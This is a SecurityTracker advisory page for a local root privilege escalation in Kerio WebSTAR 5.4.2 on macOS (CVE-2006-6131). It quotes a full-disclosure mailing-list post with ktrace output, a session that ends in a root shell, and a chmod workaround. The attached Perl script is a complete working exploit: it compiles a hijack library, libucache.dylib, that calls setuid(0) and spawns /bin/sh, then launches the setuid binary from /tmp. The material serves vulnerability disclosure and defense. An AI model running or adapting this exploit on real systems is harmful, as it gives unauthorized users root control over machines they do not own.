SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Kerio WebSTAR Vendors:   Kerio Technologies
Kerio WebSTAR Lets Certain Local Users Gain Root Privileges
SecurityTracker Alert ID:  1017239
SecurityTracker URL:  http://securitytracker.com/id/1017239
CVE Reference:   CVE-2006-6131   (Links to External Site)
Updated:  Jun 2 2008
Original Entry Date:  Nov 16 2006
Impact:   Root access via local system
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.4.2 and prior versions
Description:   A vulnerability was reported in Kerio WebSTAR. A local user can obtain root privileges on the target system.

A local user in the 'webstar' or 'admin' groups can invoke the 'WSAdminServer' or 'WSWebServer' applications to execute arbitrary code on the target system with root privileges.

Both applications attempt to load a helper library from the current directory. A local user can create a specially crafted library file containing arbitrary code and then cause either of the applications to execute the file with root privileges.

Kevin Finisterre reported this vulnerability.

The original advisory is available at:

http://www.digitalmunition.com/DMA[2006-1115a].txt

Impact:   A local user in the 'admin' or 'webstar' group can obtain root privileges on the target system.
Solution:   No solution was available at the time of this entry. The vendor is working on a fix.

The report indicates that, as a workaround, you can run the following command:

chmod -s /Applications/Kerio WebSTAR/AdminServer/WSAdminServer and /Applications/Kerio WebSTAR/WebServer/WSWebServer

Vendor URL:  www.kerio.com/webstar_home.html (Links to External Site)
Cause:   Access control error
Underlying OS:  UNIX (macOS/OS X)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Kerio WebSTAR local privilege escalation

This is a multi-part message in MIME format.
--------------060609090507090403010203
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit



--------------060609090507090403010203
Content-Type: text/plain; x-mac-type="0"; x-mac-creator="0";
	name="DMA[2006-1115a].txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="DMA[2006-1115a].txt"

DMA[2006-1115a] - 'Kerio WebSTAR local privilege escalation'
Author: Kevin Finisterre
Vendor(s): http://www.kerio.com/webstar_home.html
Product: 'Kerio WebSTAR <= 5.4.2 (?)'
References: 
http://www.digitalmunition.com/DMA[2006-1115a].txt

Description:
Kerio WebSTAR is an easy-to-use web server for Mac OS X. Acquired in January 2006 from 4D, Kerio WebSTAR 5 (formerly known as 4D 
WebSTAR Server Suite) helps small companies run Internet and intranet websites and integrate them with databases.

Upon installing Kerio WebSTAR you will find that you have inherited two setuid binaries in /Applications 
kevin-finisterres-computer:~/Desktop kf$ find /Applications/Kerio\ WebSTAR -perm -4000 -ls
978790 3016 -rwsrwx--x    1 root     admin     1542556 Apr 10  2006 /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
979475 3288 -rwsrwx---    1 root     admin     1679724 Apr 10  2006 /Applications/Kerio WebSTAR/WebServer/WSWebServer

If an attacker is able to gain access to either the webstar user or the admin group, he or she may be able to execute code as 
root by abusing the binaries mentioned above. For some odd reason both binaries try to load a helper library from within the current
 
directory. In most cases this is obviously not a good idea because an attacker can simply provide the application with the trojaned
 
library of his choice. 

kevin-finisterres-computer:~ kf$ /Applications/Kerio\ WebSTAR/WebServer/WSWebServer
dyld: Library not loaded: libucache.dylib
  Referenced from: /Applications/Kerio WebSTAR/WebServer/WSWebServer
  Reason: image not found
Trace/BPT trap

kevin-finisterres-computer:~ kf$ /Applications/Kerio\ WebSTAR/AdminServer/WSAdminServer  
dyld: Library not loaded: libucache.dylib
  Referenced from: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
  Reason: image not found
Trace/BPT trap

ktrace gives a better look at what is going on... 

  1183 WSAdminServer CALL  open(0x17e8,0,0)
  1183 WSAdminServer NAMI  "libucache.dylib"
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0xffffffff)
...
  1183 WSAdminServer CALL  open(0xbfffea90,0,0)
  1183 WSAdminServer NAMI  "/var/root/lib/libucache.dylib"
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0xffffffff)
  1183 WSAdminServer RET   close -1 errno 9 Bad file descriptor
  1183 WSAdminServer CALL  open(0xbfffea90,0,0)
  1183 WSAdminServer NAMI  "/usr/local/lib/libucache.dylib"
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0xffffffff)
  1183 WSAdminServer RET   close -1 errno 9 Bad file descriptor
  1183 WSAdminServer CALL  open(0xbfffeaa0,0,0)
  1183 WSAdminServer NAMI  "/usr/lib/libucache.dylib"
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0xffffffff)

Exploitation is pretty cut and dry, change directories to a folder that you can write to, compile your helper library, and
take root. 

kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl 

Usage: ./kerio_WebSTAR_pwn.pl <target> 

Targets:

        0 . kerio-webstar-5.4.2-mac.bin - WSAdminServer
        1 . kerio-webstar-5.4.2-mac.bin - WSWebServer

kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl 0
*** Target: kerio-webstar-5.4.2-mac.bin - WSAdminServer, Binary: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
/tmp/kerio_pwn.c: In function 'kerio_pwned':
/tmp/kerio_pwn.c:2: warning: incompatible implicit declaration of built-in function 'exit'
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 9(procmod), 80(admin)

As mentioned previously you must be in the admin group or be the webstar user in order to exploit this issue. If permissions
have been changed other users may be able to elevate their status to root as well. 

kevin-finisterres-computer:~ notadmin$ id
uid=505(notadmin) gid=505(notadmin) groups=505(notadmin)
kevin-finisterres-computer:~ notadmin$ /Applications/Kerio\ WebSTAR/WebServer/WSWebServer
-bash: /Applications/Kerio WebSTAR/WebServer/WSWebServer: Permission denied
kevin-finisterres-computer:~ notadmin$ /Applications/Kerio\ WebSTAR/AdminServer/WSAdminServer
-bash: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer: Permission denied

Workaround:
Kerio has been contacted, fixes will be available soon. In the mean time limit access to the admin group and the webstar user. 

Please chmod -s /Applications/Kerio WebSTAR/AdminServer/WSAdminServer and /Applications/Kerio WebSTAR/WebServer/WSWebServer

--------------060609090507090403010203
Content-Type: text/plain; x-mac-type="0"; x-mac-creator="0";
	name="kerio_WebSTAR_pwn.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="kerio_WebSTAR_pwn.pl"

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) 
#
# you must have access to the webstar user or be in the admin group
#
# This is currently not patched... chmod -s your kerio binaries

foreach $key (keys %ENV) {

    delete $ENV{$key};

}

$tgts{"0"} = "kerio-webstar-5.4.2-mac.bin - WSAdminServer:/Applications/Kerio WebSTAR/AdminServer/WSAdminServer";
$tgts{"1"} = "kerio-webstar-5.4.2-mac.bin - WSWebServer:/Applications/Kerio WebSTAR/WebServer/WSWebServer";

unless (($target) = @ARGV) {

        print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Binary: $b\n";

open(KP,">/tmp/kerio_pwn.c");
printf KP "extern char * argv; __attribute__((constructor)) static void kerio_pwned()\n"; 
printf KP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); exit(0); }\n";

system("gcc -dynamiclib -o /tmp/libucache.dylib /tmp/kerio_pwn.c -current_version 5.0.1 -compatibility_version 5.0.1 -install_name
 libucache.5.dylib -arch ppc"); 
 
system("cd /tmp; \"$b\"");







--------------060609090507090403010203
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--------------060609090507090403010203--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC